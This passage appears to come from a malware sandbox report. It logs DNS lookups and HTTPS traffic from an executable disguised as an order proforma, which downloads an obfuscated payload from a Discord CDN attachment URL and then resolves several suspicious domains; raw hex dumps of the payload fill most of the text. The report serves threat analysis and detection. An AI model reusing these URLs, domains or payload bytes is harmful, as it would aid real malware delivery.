Nov 25, 2021 16:51:20.503468037 CET	8.8.8.8	192.168.2.4	0x1bcd	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:20.503468037 CET	8.8.8.8	192.168.2.4	0x1bcd	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:20.503468037 CET	8.8.8.8	192.168.2.4	0x1bcd	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:20.503468037 CET	8.8.8.8	192.168.2.4	0x1bcd	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:20.503468037 CET	8.8.8.8	192.168.2.4	0x1bcd	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:48.358931065 CET	8.8.8.8	192.168.2.4	0x228	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:48.358931065 CET	8.8.8.8	192.168.2.4	0x228	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:48.358931065 CET	8.8.8.8	192.168.2.4	0x228	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:48.358931065 CET	8.8.8.8	192.168.2.4	0x228	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:48.358931065 CET	8.8.8.8	192.168.2.4	0x228	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:58.452172995 CET	8.8.8.8	192.168.2.4	0xdb6b	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:58.452172995 CET	8.8.8.8	192.168.2.4	0xdb6b	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:58.452172995 CET	8.8.8.8	192.168.2.4	0xdb6b	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:58.452172995 CET	8.8.8.8	192.168.2.4	0xdb6b	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:58.452172995 CET	8.8.8.8	192.168.2.4	0xdb6b	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:39.713310003 CET	8.8.8.8	192.168.2.4	0xca67	No error (0)	www.77777.store		103.120.80.111	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:39.713310003 CET	8.8.8.8	192.168.2.4	0xca67	No error (0)	www.77777.store		103.139.0.9	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:40.618999958 CET	8.8.8.8	192.168.2.4	0xca67	No error (0)	www.77777.store		103.120.80.111	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:40.618999958 CET	8.8.8.8	192.168.2.4	0xca67	No error (0)	www.77777.store		103.139.0.9	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:45.689924002 CET	8.8.8.8	192.168.2.4	0x6ace	No error (0)	www.tajniezdrzi.quest		37.123.118.150	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:51.236844063 CET	8.8.8.8	192.168.2.4	0x8b4d	No error (0)	www.pkem.top		104.233.161.196	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:56.880512953 CET	8.8.8.8	192.168.2.4	0xa51d	No error (0)	www.hagenbicycles.com	hagenbicycles.com		CNAME (Canonical name)	IN (0x0001)
Nov 25, 2021 16:53:56.880512953 CET	8.8.8.8	192.168.2.4	0xa51d	No error (0)	hagenbicycles.com		85.194.202.138	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49759	162.159.134.233	443	C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-25 15:51:20 UTC	0	OUT	GET /attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxyckamobho HTTP/1.1 User-Agent: lVali Host: cdn.discordapp.com
2021-11-25 15:51:20 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 15:51:20 GMT Content-Type: application/octet-stream Content-Length: 455680 Connection: close CF-Ray: 6b3c09b3d85bc290-FRA Accept-Ranges: bytes Age: 105675 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Lxtcsmegwxhfqoabkjaduxyckamobho ETag: "8242fb2442748493aa1d31dda471d43a" Expires: Fri, 25 Nov 2022 15:51:20 GMT Last-Modified: Wed, 24 Nov 2021 08:13:21 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1637741601530592 x-goog-hash: crc32c=lwQmpg== x-goog-hash: md5=gkL7JEJ0hJOqHTHdpHHUOg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 455680 X-GUploader-UploadID: ADPycdututbtUcRl5WSW_hry_FIQngXAEOTvsF_C9upp3XZeadVl41eP9j6KorcCz-oWIrYx9Hq0o2OS5hKBDlbxS2aeJWKHkw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-11-25 15:51:20 UTC	1	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 6d 39 4b 59 7a 48 6a 31 62 4b 36 41 50 76 69 6f 69 37 46 50 43 6e 67 65 45 75 69 36 55 4e 35 71 6d 65 57 6c 7a 25 32 42 48 35 51 30 68 30 70 25 32 46 25 32 46 34 6d 5a 4f 62 25 32 46 76 75 78 50 34 77 48 4e 45 75 25 32 46 71 78 44 73 65 68 65 48 6d 77 52 58 32 4d 6f 52 42 53 36 58 6d 6e 6b 42 38 32 6b 73 76 33 70 51 25 32 42 6f 38 43 57 57 32 25 32 46 6c 54 44 52 65 39 56 76 6c 5a 43 6c 50 78 68 36 6f 75 38 32 5a 50 55 5a 59 30 33 37 50 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=m9KYzHj1bK6APvioi7FPCngeEui6UN5qmeWlz%2BH5Q0h0p%2F%2F4mZOb%2FvuxP4wHNEu%2FqxDseheHmwRX2MoRBS6XmnkB82ksv3pQ%2Bo8CWW2%2FlTDRe9VvlZClPxh6ou82ZPUZY037PA%3D%3D"}],"group":"cf-nel","m
2021-11-25 15:51:20 UTC	1	IN	Data Raw: 06 a2 3a 2a 02 a3 a5 a2 2b 8e 0f ca 93 89 f5 92 0c b5 6b 2d 8a 76 54 f7 9f ac c2 8a 73 39 ad 5e 8f 8d f7 83 e1 d1 38 31 80 5a f0 7f df cf 22 62 95 9c 2d 8a 73 3c 23 ed f6 02 ac c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 Data Ascii: :*+k-vTs9^81Z"b-s<#DrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yD
2021-11-25 15:51:20 UTC	2	IN	Data Raw: 22 57 67 02 87 f2 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e Data Ascii: "Wgh7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/k
2021-11-25 15:51:20 UTC	4	IN	Data Raw: 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 Data Ascii: /kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa
2021-11-25 15:51:20 UTC	5	IN	Data Raw: dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 99 8a 6b 01 08 91 9e 03 02 81 c8 89 dc 66 8d dc 54 ce bd 57 66 8d eb cc 8c 61 35 bf 68 87 f1 d2 b4 c4 a0 37 8e 19 cd 09 2c 2f f3 e1 c4 Data Ascii: TWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/kfTWfa5h7,/
2021-11-25 15:51:20 UTC	6	IN	Data Raw: d4 47 44 73 a9 b3 5a e2 aa 26 6c 59 8c 67 c6 af b5 f9 a2 e4 d4 a4 c3 93 5e 12 50 13 43 65 c8 08 94 e9 ec 4c 2c f9 99 6f c0 d8 39 49 fb d0 53 1b c9 4e 25 e3 f0 64 6d c7 55 82 8b b4 1f 60 da 5d 1d 05 dc 24 97 66 b1 bc 11 e1 22 0d 13 dd 24 56 0c 2d 93 7a a0 3c 86 64 70 3a 36 d9 b4 cc 6b 0a 30 d6 c7 b9 cc 58 b7 46 93 78 1f 5f 13 46 46 20 85 ab c4 d2 05 da 9d ba 02 ad 6b 56 e1 c0 e3 f0 be f5 60 65 84 2f 3b ad c5 b7 7f 47 1f 15 35 b2 c7 f5 8d dc be 7a 1e b9 e0 a2 c0 be 20 83 f1 1c fb d2 5d f0 66 4e 7a 67 d9 c8 b6 1c 91 ad d2 49 e1 93 c5 3d 9c 3c 1b 1f 73 6d d0 5f 5f f1 19 8e ff 1d 08 23 d9 c2 72 a0 c3 fe 3a c8 92 26 96 8c 69 ba 69 d1 77 53 17 f1 29 7d 41 ba 62 6a e9 03 dd 53 90 f8 22 8f df 0d b7 90 99 11 52 1a 4d ba 96 04 5c c3 23 d6 9d 31 76 96 ee d8 ef 16 e6 Data Ascii: GDsZ&lYg^PCeL,o9ISN%dmU`]$f"$V-z<dp:6k0XFx_FF kV`e/;G5z ]fNzgI=<sm__#r:&iiwS)}AbjS"RM\#1v
2021-11-25 15:51:20 UTC	8	IN	Data Raw: fe f0 80 47 66 83 b0 53 fa 02 a5 55 9b b5 76 60 84 83 19 20 52 00 75 e9 c6 a8 df 91 c2 9e 23 00 15 f3 ef ee 20 05 4a 0b 4a 23 79 ac eb ca 2b dc 04 a0 57 88 fb 84 47 52 cc f1 95 04 d9 c0 65 3a 32 0c fa 62 a5 46 b3 b9 f7 ab 50 f5 fe 25 98 d4 b7 9f 04 c7 12 63 07 12 26 fb ec 85 5a e4 71 27 c8 3e 86 22 75 2d 29 90 12 6e 25 85 ed d6 8a 9d 08 9a 3d 93 f5 f0 74 0c b1 ad fa 2e 02 bf fa 19 cd 52 99 69 8c 1c 44 e4 6d 49 66 51 11 37 01 0a 96 08 04 68 6e 51 16 a8 2c 2b 95 84 e7 0d f8 bf 04 43 b3 71 21 e0 96 ce 66 2f 94 e8 98 7a 53 44 e2 7a 55 57 0a 5f e6 47 66 83 05 51 6e 5d 01 f0 84 73 29 a0 ba 3e f1 5f 34 f5 b0 fd b4 c5 2e 78 7f 4c d1 dd f6 24 65 07 f4 5f 51 65 69 d1 4e 80 7a 6d 35 ea 3a 31 e1 2f f7 92 2b 94 7e e4 e4 00 e3 29 e7 ff 87 f9 27 b8 b9 5a 81 04 c4 a4 21 Data Ascii: GfSUv` Ru# JJ#y+WGRe:2bFP%c&Zq'>"u-)n%=t.RiDmIfQ7hnQ,+Cq!f/zSDzUW_GfQn]s)>_4.xL$e_QeiNzm5:1/+~)'Z!
2021-11-25 15:51:20 UTC	9	IN	Data Raw: c0 c1 ea c1 2d ac e9 78 65 06 2f 99 69 88 6e a2 2e ae 94 50 8c 0f 36 94 01 38 0a 74 e6 11 96 6c 54 41 53 4d 43 cc 5f c8 39 d2 57 c0 dc 58 ef 01 c9 d6 18 26 98 a5 94 09 24 fd b8 f8 86 6b d1 ca 86 71 11 87 16 bb 17 aa 2e f5 9a 36 3b 92 13 e7 ca 90 e9 1e 7e 4c ff 3f 7a 97 72 85 00 66 b1 7a 6b 6c 34 90 74 b5 97 6e af 41 5d 91 85 e0 73 4e 15 bc e5 fd b5 d5 64 d4 bd 0f 3c 5f 18 79 d1 69 43 22 9a 61 ec 55 50 f9 9a 23 55 c6 f0 09 d0 9f 85 f3 ed 8f 7b 35 7a 49 ac a3 a4 25 d3 48 bc cd c5 77 2e 20 75 eb f6 dd 89 a9 19 db 2e 77 d1 3c 17 21 48 71 58 c6 67 6f 1e 4a f3 25 ab 08 f5 88 84 11 d7 25 e7 34 14 70 4f 10 b0 dc 55 55 51 ea a4 ee cb 60 72 b2 c8 b2 c6 87 4f c3 45 34 e3 aa e5 c6 9b 42 38 c7 2f ec 88 76 6a bf 6b 8c 38 71 5a f9 74 b4 f1 e5 f3 bb 85 08 c1 7d 3f c5 12 Data Ascii: -xe/in.P68tlTASMC_9WX&$kq.6;~L?zrfzkl4tnA]sNd<_yiC"aUP#U{5zI%Hw. u.w<!HqXgoJ%%4pOUUQ`rOE4B8/vjk8qZt}?
2021-11-25 15:51:20 UTC	10	IN	Data Raw: 32 1f 98 ef 16 4f 44 e4 51 a8 cd b5 1b 1e 8b e0 6e ad d4 5b 40 97 e9 18 68 8d e2 45 a3 7a d3 60 f2 9f 9a 3f a2 23 6c 7c d8 80 5a 06 99 87 f2 52 0e b2 40 89 89 1d 8c 6a 8f 9c 66 37 0b 0b 3e d7 58 e1 c4 ac 31 f5 30 6f 0c 51 00 82 40 18 c4 b1 a3 af 59 89 9a 32 08 ac f4 c4 a6 2e 63 e0 7e 43 62 b1 d5 82 85 52 93 72 85 f3 dd db 5a e8 8c 89 8a 8b 8e 2d 92 1d 0a 1c 3a 43 3a ca e8 42 db d1 5c 93 2c 94 17 2f e0 55 6f 1a 98 44 7c 68 dc ad 38 3f 92 14 13 d1 cf 8e 06 43 4e f8 1e 4c 42 3f 2e 41 7f 31 94 0f e1 f5 52 84 e7 7d dc b1 52 c7 1d fb bc 3d e6 29 f7 72 e7 c4 af 70 af 2b fb 4a af ac 97 8e 21 ed 8b 4f 5c 7f a5 46 86 40 21 e6 64 b1 99 c3 7a aa 8d de 50 f5 97 65 c4 4b 5e 70 eb f2 66 b5 15 e9 91 5d 7b 38 68 b7 4e ff ee c5 27 e4 5f e4 0e 58 ed ca 03 d4 2c 50 da 55 2d Data Ascii: 2ODQn[@hEz`?#l\|ZR@jf7>X10oQ@Y2.c~CbRrZ-:C:B\,/UoD\|h8?CNLB?.A1R}R=)rp+J!O\F@!dzPeK^pf]{8hN'_X,PU-
2021-11-25 15:51:20 UTC	12	IN	Data Raw: 96 1b 19 a2 cf 4c f5 9e 3f bd 99 15 b6 9a fb e6 7f c2 93 30 20 1b 47 48 29 ff 86 71 11 aa 12 00 26 01 f6 0b 2d a7 a0 50 78 84 15 d5 dd b5 78 5d 22 a5 8c 4d 59 43 af 57 56 d6 90 37 1f 79 e4 52 1f e9 cf 31 85 4c 75 f0 23 86 99 ea 7a 69 07 8e 0e 9a 41 39 53 19 cb 39 b1 42 79 03 20 13 31 da 91 94 06 86 eb 64 24 08 55 30 37 be e9 fc 67 7b 85 ed 16 12 57 6a 8f e2 3b 54 0b 44 2e 49 40 14 50 4d ee 4a 9e 2e ff c5 10 51 4c 69 70 91 e1 ef 19 8b d8 98 3f ab 43 4a 6f 39 59 21 db d3 30 4a 8c f6 5b 72 4f 22 6f 14 6c f6 6a f1 c7 76 bb 5f 1c 43 58 88 ae 73 d2 d5 ce b4 ce bd 60 d6 90 6f 75 bd 92 16 76 5d 16 16 e8 56 3c 34 e7 ce b1 45 63 79 f3 91 53 10 ac d8 a3 9c 3b 73 e0 9d 7d d1 c7 26 6f 27 db 03 15 e8 67 20 87 c5 26 5e ad 44 66 af 86 66 69 0c 99 8e 1c bc 83 07 9e 5a 0b Data Ascii: L?0 GH)q&-Pxx]"MYCWV7yR1Lu#ziA9S9By 1d$U07g{Wj;TD.I@PMJ.QLip?CJo9Y!0J[rO"oljv_CXs`ouv]V<4EcyS;s}&o'g &^DffiZ
2021-11-25 15:51:20 UTC	13	IN	Data Raw: a0 2d 66 cc 82 77 d7 22 50 f1 e7 a4 c2 a5 9e 0f ea 4c 42 02 40 85 e1 3f af 4c cb 09 b5 a9 bc 07 31 83 f3 de ed 0c 56 d2 81 f8 22 23 d5 86 7b f5 75 9f 51 67 94 e0 6c 19 c6 1a d6 55 3b 3a 2a b6 c7 22 50 f5 65 ea 25 e9 f4 14 d8 4e 0b 20 fd 6b eb be 1b 4d 7d fe ba c6 a9 55 65 e6 34 4f 75 d7 27 67 e7 3c 10 59 6a 8c ea 2b 2e a0 09 16 ff b9 0c 9a 03 c3 f2 6a b2 ff 8a e7 3c 00 ba f1 e6 77 48 9c ab ff b1 40 98 31 64 7f 8b e7 ca 87 69 dc af 70 a2 25 d0 2f df 3d 06 8b db 3c 33 5f 89 0e 39 3d 43 1e ec 63 d7 00 44 0a 33 46 8b e0 ac 4f 9e 67 e1 36 03 da 9c d3 ba cf bd ea f2 95 ca 96 13 df 3d f8 22 6c 83 fa 7b d5 1a 80 40 1c 73 2c 2b cf db 0e a1 00 ba 0f df c0 8a 6b d1 79 e5 c3 14 55 0b 39 8b 15 8d ee 67 02 8a 59 5e 76 e8 78 aa 60 ae 3f 9b d5 43 6d dd 90 27 ef e2 47 47 Data Ascii: -fw"PLB@?L1V"#{uQglU;:*"Pe%N kM}Ue4Ou'g<Yj+.j<wH@1dip%/=<3_9=CcD3FOg6="l{@s,+kyU9gY^vx`?Cm'GG
2021-11-25 15:51:20 UTC	14	IN	Data Raw: 94 16 4e 91 fa 23 39 ed 1b f2 8c 26 60 a8 df d8 5a 44 c3 1e 6d 5d 27 3b fb 64 2d 9a 1a 4c 5e fd 85 cc 70 f7 9d 86 7a 64 5e 09 36 3b b8 ca be 34 88 68 4d 12 5a ef e6 78 bf e8 84 46 29 c9 0f e9 fb b5 8c c3 3c 17 a3 b9 44 c2 84 43 9e 3a de de 6d c7 40 2e 3a 08 92 e5 4b b0 c8 e6 23 dd 0a ac 29 1c 7a b1 dc 11 31 34 06 da 9f 2c f1 b6 c0 d6 ac e5 0d 89 0c 9f 49 1b 32 a9 61 67 01 07 c7 44 d4 9a 39 8f 6d 9f 93 93 f9 a8 ea 94 43 65 0b 28 14 ae 4d a0 37 a7 bc e2 2c 71 2f 58 aa 3a 0e a8 9a 05 31 bc 94 ea df a8 e8 1f 9f b4 2f de a5 17 93 84 7d ce a2 53 f6 e5 97 8a 56 e5 cb e8 e1 e8 43 b2 8f 95 b4 fe 33 53 e5 e2 76 a9 55 ae 47 67 1a 4f 47 ab 11 db dd ee 66 7a f4 3a 34 19 a0 05 20 18 70 78 54 0a 29 c6 6e ed fa 2a 16 49 b5 f9 b7 7d a9 31 8f 48 f4 fd 1e 74 cb 07 af a7 e0 Data Ascii: N#9&`ZDm]';d-L^pzd^6;4hMZxF)<DC:m@.:K#)z14,I2agD9mCe(M7,q/X:1/}SVC3SvUGgOGfz:4 pxT)n*I}1Ht
2021-11-25 15:51:20 UTC	16	IN	Data Raw: b1 23 f7 a6 14 57 66 07 d0 ee e3 d6 cb 31 8e 1d ce 3a c8 c8 1b 98 92 0f a9 c6 c0 72 b4 7b 34 46 21 a6 82 f8 eb 7a 67 f4 49 72 51 20 7e 47 6b d1 34 36 fe 98 0d 17 39 a8 e3 c1 11 38 c8 82 f1 1e 00 ce ba cc b4 74 78 32 bf b3 c2 64 00 f2 98 13 d8 2c 1b fc 9d 51 d6 a7 ba 18 19 22 f6 92 90 a4 c3 e9 f0 09 d8 43 81 21 34 92 78 ad af b6 18 48 f2 3a f8 b5 43 54 5b 2d 7d de fe 27 ee 64 74 52 b4 6d a1 ec 67 b4 c9 0b db 3c 1e 48 90 83 ff 35 bc 15 af ec 52 fc 08 36 d9 b7 94 94 ed a2 5c 2b ae f3 00 9d 68 4e 9e 81 cd e1 c4 23 45 4c 21 e9 f7 a1 ae fb 7c 76 e7 1a b1 b7 72 6c d1 c0 f4 b0 f0 95 42 0c a0 03 37 87 49 40 fa c0 80 fb bd e4 d8 65 19 45 af 0c 2b 83 06 10 88 68 52 f7 2d d2 47 b3 4d 81 e1 3f 87 65 b7 54 cb 79 38 be e0 b4 aa 63 59 92 6b 37 0c ac 28 1f 4f 3f 4e 41 68 Data Ascii: #Wf1:r{4F!zgIrQ ~Gk4698tx2d,Q"C!4xH:CT[-}'dtRmg<H5R6\+hN#EL!\|vrlB7I@eE+hR-GM?eTy8cYk7(O?NAh
2021-11-25 15:51:20 UTC	17	IN	Data Raw: 1a ff 86 df 5e dc 10 a6 2f b1 0e 89 19 f6 28 b9 4a 67 92 5d b1 a6 29 a2 c3 09 29 10 a9 a2 69 ac 99 5d ef d8 96 a2 10 e0 c5 5f d7 cf 3c 25 1e 60 94 88 88 8c 2f 0f 87 62 60 9e 3e 80 d4 11 52 b3 07 cb 07 3d 5e 88 65 8b 19 5f 41 c5 5b af 79 db e5 25 f8 2a f1 13 80 c5 a5 27 60 ce 8b 78 61 0b df cb 3c b0 ac ee 6d 0f d2 3a df 80 ce a3 33 4d 2b 0d c6 cb 9b da 39 c1 f8 2a 4f 07 72 8e 3a d4 72 1c b3 b4 63 ea 22 94 5f ec 7d fe 02 20 e6 81 e4 f0 69 05 08 a0 ad bd 95 2c 19 f8 16 ce 1d 10 a3 04 80 74 a7 fd e6 f3 e5 c2 3f a9 58 ed ff 69 0b 96 09 15 c1 bc d2 20 19 2d 2e 35 b2 c4 98 50 18 e7 cd 0f 1b e6 f5 a1 a7 a2 20 fb 6b c7 a0 0f ea 7f 5f a9 bf 8e a9 65 08 ac 91 30 be e2 7b 07 71 96 3d 93 ae f9 1f 07 c0 43 6c ba cf af 29 6a f0 63 30 05 34 a2 c4 b0 60 98 3d 94 5d 83 43 Data Ascii: ^/(Jg]))i]_<%`/b`>R=^e_A[y%'`xa<m:3M+9Or:rc"_} i,t?Xi -.5P k_e0{q=Cl)jc04`=]C
2021-11-25 15:51:20 UTC	18	IN	Data Raw: e6 ca c1 b9 e8 7f f1 17 ad 52 47 5b af 41 44 e6 7e 38 35 b6 bf ad c2 ab 5e 99 e2 5f e5 35 5b 1a 76 66 c6 b3 c0 dc 58 4c ca 60 6f 0a 29 7f d5 51 90 20 73 bd 9f 45 20 9b 88 69 7e 87 49 77 a7 29 d9 1b 48 ca bf 8c 02 2d 01 f1 06 35 aa 25 8a 66 be e9 41 5c a2 22 e0 31 be e9 f9 a9 d9 cf 69 b9 19 58 7c 94 6b a0 d0 f9 16 53 1f 71 c2 d2 32 ea d0 b6 75 24 01 4c c0 dd ee 80 74 df 35 44 d7 16 48 5f 92 51 31 b5 73 21 11 3d 32 8d e0 64 ec 85 30 5f e1 f6 14 58 07 c8 12 c7 1b f0 ef 0b 5a 9b 9d b0 fc 9c c5 66 d0 4f 7f ca 18 00 eb 76 66 8d 5b 14 ac 37 cc 06 b1 4b cf b0 95 97 2c 2c 12 af 55 f4 f7 fb 2d ae cd 0a 96 a9 c6 0f c7 e4 f6 1c 45 69 0c a0 06 8e 5b 52 68 83 f9 61 1f c6 7c bf d3 03 01 02 51 06 c4 1f f4 24 ef 0c 4a c1 fb 6b 89 e7 bf 67 36 1c e4 d5 1a 49 e2 7f 5f 80 d2 Data Ascii: RG[AD~85^_5[vfXL`o)Q sE i~Iw)H-5%fA\"1iX\|kSq2u$Lt5DH_Q1s!=2d0_XZfOvf[7K,,U-Ei[Rha\|Q$Jkg6I_
2021-11-25 15:51:20 UTC	20	IN	Data Raw: 2b 98 a2 2f 21 01 94 02 e1 db 4f 4b 42 7c 71 cf aa 8a fa f7 68 43 53 79 e8 e2 05 93 11 dc 62 6a 4f 02 b3 75 db 72 d5 80 45 27 4d 3e 92 1f 77 3f b3 c0 6d 67 af 73 1b c2 65 1b 17 57 88 75 7e 80 f7 a6 ca 0f c8 1b 15 38 df 5b a2 15 7a 64 20 49 ea 7e e5 c2 26 6b 87 cb ec 43 a0 38 3a 33 1b 4e c0 ed 92 eb a0 a5 be 3e 3c c6 c3 96 6b f5 8a 01 5e 87 63 e3 8f 0e b9 d2 b5 ca be 72 f7 6f c3 2c 13 11 b1 ae ab 6e 65 e5 f7 a7 a3 9d 13 6c 37 45 a7 9c 3a 35 8a 9d 5e 1a 7b f0 6a 4d a6 28 2f b6 f5 75 2e f9 ae f7 99 df b0 3f 93 94 f5 84 4a a7 a8 e6 3d aa 51 f8 03 05 42 57 8f 09 69 c5 dd df 01 8e 88 84 20 8d b8 63 08 a0 3f 21 11 5b 28 8f 70 f6 16 a7 69 04 83 cd e3 7d fe e6 47 66 75 45 51 7c 42 5e 5b 56 55 68 89 de 6f b8 06 5d 4d 7b c1 1f 34 63 99 e6 b3 40 fe 3c 85 f7 f9 6e ab Data Ascii: +/!OKB\|qhCSybjOurE'M>w?mgseWu~8[zd I~&kC8:3N><k^cro,nel7E:5^{jM(/u.?J=QBWi c?![(pi}GfuEQ\|B^[VUho]M{4c@<n
